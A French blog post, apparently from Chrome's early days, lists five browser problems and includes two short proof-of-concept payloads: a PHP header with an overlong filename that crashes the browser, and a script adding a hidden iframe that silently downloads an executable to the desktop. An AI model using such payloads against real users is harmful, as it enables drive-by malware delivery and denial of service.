Chrome : 5 (gros) problèmes et vulnérabilités

La grande euphorie du premier jour est passée pour le navigateur internet de Google : Chrome. Jetons un oeil sur ces problèmes glanés ici et là (sur des sites pas tous recommandables) qui font qu’il n’est pas forcément judicieux d’utiliser la bestiole pour l’instant.

1. Désinstaller Google Chrome

Bon c’est plus lié à Vista qu’à un bug de Chrome mais c’est rapidement irritant (pour rester poli) : le lien pour désinstaller Google Chrome précède celui pour lancer le navigateur dans la recherche rapide de Windows Vista. Donc adieu le rapide « Chrome <ENTER> ».

2. Un spyware ?

Je ne vais pas développer ce point, je vous invite à aller voir le billet de Korben .

3. Le coup du :%

Essayez voir d’écrire le caractère double point suivi du signe pourcentage dans la barre d’adresse. Le résultat est sans appel : plantage total du navigateur avec les messages que j’ai déjà pu citer ; en fait je vous ai déjà fait part de ce problème mais via un lien dans une page internet (voir Chrome : Plantage de tous les onglets). Philippe en parle d’ailleurs aussi.

4. Le téléchargement forcé d’un fichier avec un trèèès long nom

Allez, c’est parti pour un petit bout de code qui provoque un… autre plantage total.

<?php
$cadeaudetichou = 'cadeaudetichoupourchome[...]quilefaitplanter.jpg';
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$cadeaudetichou");
?>

Pensez à remplacer les […] par environ 5 000 caractères et vous serez bon.

5. L’abus du téléchargement automatique

Par défaut, Chrome télécharge automatiquement un fichier sur le bureau. On va donc utiliser cette propriété pour y placer n’importe quoi : image, vidéo, logiciel, etc.

<script>
document.write('<iframe src="http://www.example.com/executable.exe" frameborder="0" width="0" height="0">');
</script>

Vous l’aurez compris, il s’agit d’une véritable vulnérabilité.

Pour ces quelques bonnes raisons et d’autres encore, il est donc déconseillé d’utiliser Google Chrome comme navigateur à plein temps jusqu’à ce qu’une nouvelle version voit le jour.

Baptiste Simon aka TiChou

Ingénieur développeur web dans le secteur du e-commerce et du tourisme mais avant toute chose passionné par internet et ses intarissables ressources.

2 commentaires, pings et rétroliens

  • Hikaru

    Hum, j’ai donc bien fait de ne pas tester trop vite :D

  • TiChou » Plantage sévère de Firefox 3.0.3

    […] aux nombreux tests effectués dès sa sortie. Ces manipulations avaient permis de déceler des vulnérabilités et autres instabilités du navigateur. Mais il est également possible de mettre en avant des instabilités dans Firefox qui est pourtant […]

Partenaires et blog à la une